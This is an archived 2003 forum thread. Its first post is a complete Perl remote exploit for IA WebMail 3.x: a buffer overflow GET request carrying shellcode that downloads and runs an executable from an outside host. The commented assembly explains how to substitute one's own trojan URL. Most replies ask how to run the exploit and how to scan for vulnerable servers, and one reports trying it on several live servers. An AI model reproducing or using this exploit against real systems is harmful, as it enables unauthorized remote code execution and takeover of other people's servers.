Ia Webmail 3.x (iaregdll.dll Version 1.0.0.5) Remo

Toilal

Nov 19 2003, 12:30 PM

Tested and works perfectly !

CODE

#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#
# By Peter Winter-Smith peter4020 hotmail.com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
# - WebMailsvr.exe exits without consuming 100% resources in most
# cases.
# - This has only been tested with IA WebMail 3.1, however it was
# designed to exploit all versions.

use IO::Socket;

if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}

$shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
"\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
"\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
"\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
"\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
"\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
"\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
"\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
"\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
"\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
"\xFF\x36\x50\xFF\x15\x14\x52\x02" .
"\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
"\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
"\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
"\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
"\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
"\x15\x14\x52\x02\x10\x5A\x52\x31" .
"\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
"\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
"\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
"\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
"\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
"\x46\x69\x6C\x65\x41\xFF\x57\x69" .
"\x6E\x45\x78\x65\x63\xFF\x68\x74" .
"\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
"\x2E\x65\x6C\x69\x74\x65\x68\x61" .
"\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
"\x6E\x63\x61\x74\x2E\x65\x78\x65" .
"\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
"\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
"\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
print "Done.\n";

close($victim);
exit;

#####################################################################
## SHELLCODE #
#####################################################################
#; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
#; Url Download + Execute
#; By Peter Winter-Smith
#; [peter4020@hotmail.com]
#;
#; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh]; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h]; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]; file path
# push dword [esi]
# lea esi, [edx-12]; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh]; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi]; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h]; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16]; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
#; When altering, you MUST be sure
#; to also alter the offsets in the 0ffh to null
#; byte search!
#; for example:
#; db 'http://www.site.com/someguy/trojan.exe',0ffh
#; count the length of the url, and add one for the 0ffh byte.
#; The above url is 38 bytes long, plus one for our null, is 39 bytes.
#; find the code saying (at the start of the shellcode):
#; push edi ; 'http://www.elitehaven.net/ncat.exe'
#; lea edi, [edi+35]
#; and make it:
#; push edi ; 'http://www.site.com/someguy/trojan.exe'
#; lea edi, [edi+39]
#; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################

elBartalo

Nov 19 2003, 12:58 PM

thx 4 your work

Can anyone compile this exploit? I have many errors by lcc compiling...
How can i scan this shit? =)

nipagini

Nov 19 2003, 01:40 PM

lol he tried to compile this...
It's in perl m8!
use xray to scan for this dll.

)Oni(

Nov 19 2003, 01:53 PM

hee why xray ?

and hm i get some errors when i try to compile it ... someone has compiled ? pls post the File !

Grohs

Nov 19 2003, 02:02 PM

yes, its perl..

you do not have to compile it.

just make a Ia Webmail 3.x.pl file, then start it with perl

sry for my bad english

greez

axl

Nov 19 2003, 03:06 PM

anyway to scan for it ??

yeyo

Nov 19 2003, 05:32 PM

Thanks man, i listened something about this exploit in ZODIAC

flame

Nov 19 2003, 05:52 PM

QUOTE (nipagini @ Nov 19 2003, 01:40 PM)

lol he tried to compile this...
It's in perl m8!
use xray to scan for this dll.

like this ?
/_vti_bin/_vti_aut/iareqdll.dll ?

Flinston

Nov 19 2003, 06:48 PM

yeah a how to scann would be usefull

thanks anyway

T3cHn0b0y

Nov 19 2003, 07:29 PM

The code is saying it will download 'http://www.elitehaven.net/ncat.exe' and execute c:\nc.exe

Shouldn't the shellcode be modified for a successful demonstation of exploit?

Gurou

Nov 20 2003, 02:57 PM

QUOTE (T3cHn0b0y @ Nov 19 2003, 07:29 PM)

The code is saying it will download 'http://www.elitehaven.net/ncat.exe' and execute c:\nc.exe

Shouldn't the shellcode be modified for a successful demonstation of exploit?

the shell code can be modified

look here : http://www.k-otik.net/exploits/11.19.iawebmail.pl.php

(at the end)

Lucaz

Nov 20 2003, 04:31 PM

Well i changed the code used my own files.. even tryed some vb exploit proggie the from the files section. but nothing worked...

The perl script doesnt make the server download my file and the vb thing always sais ia webmail not found..(i checked 6 servers by hand and 100% there was ia webmail installed and the dll was there so i really thing that proggie doesnt work)

-=[MePhIsTo]=-

Nov 20 2003, 04:34 PM

QUOTE (Toilal @ Nov 19 2003, 12:30 PM)

Tested and works perfectly !

it will be nice when you give some feedback

Yosam

Nov 20 2003, 07:17 PM

can anyone give me more information about this xray thingie?

i tried searching for it on google but no luck..

i'll appreciate if someone could give me a link to it (and a little explaination would
be helpfull as well).

thanks in advanced.

mcmix

Nov 21 2003, 08:23 AM

who have any scanner for this webmail..?